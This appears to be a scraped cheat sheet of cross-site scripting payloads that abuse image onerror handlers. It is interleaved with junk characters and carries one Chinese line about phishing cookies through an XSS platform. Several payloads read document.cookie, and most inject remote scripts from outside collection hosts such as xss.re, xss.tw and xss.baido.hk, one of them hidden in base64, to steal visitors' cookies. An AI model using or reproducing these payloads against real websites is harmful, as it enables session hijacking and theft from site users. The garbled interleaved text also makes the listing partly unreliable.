<img src='non-exist.jpg'onerror="alert('xss')">
7 ]: W' R: `6 J% d7 s& i5 j6 z<img src=# onerror=alert(123)>: A& n* J# s/ {7 o8 [! D' n6 W
<img src=# onerror=alert(document.cookie)>* B9 Z/ ]; c* q# e8 F
下面是利用平台钓cookie的5 v9 c1 @6 P7 @6 R
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
: b3 S6 ^) j0 l5 ?7 J+ b$ [
! L0 I5 F9 K$ }) M& L
6 _! U/ }$ O6 C7 J1 K. i6 M6 U. k<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
9 k8 [, f' P2 ?: L5 Q8 V<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>8 \, i! c$ w/ U! E/ S( I
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>+ B$ f4 M: ~' L T2 u+ K( S
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
; O6 Q# ]& ^8 X6 ^7 }$ Z<img src="#">& i [" x$ B) m& q' t: @- Z4 c
<img src="#">
- B3 t: ^5 N6 |4 H) p, J! Q<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
; c" z& x3 X8 h, P4 h' K0 x<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">! N4 U" ~5 J' u% E L4 N
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
' N N# `0 n) s<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>. h0 ? u" o: Q; U
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>/ b. c$ O \2 _) C! S `) C
<img src=x width="0" height="0"></img>4 q0 R! e( o# U5 A
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>: _0 L* j5 [* R" v6 U9 @3 V
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>7 L5 @9 w( o! F! c
|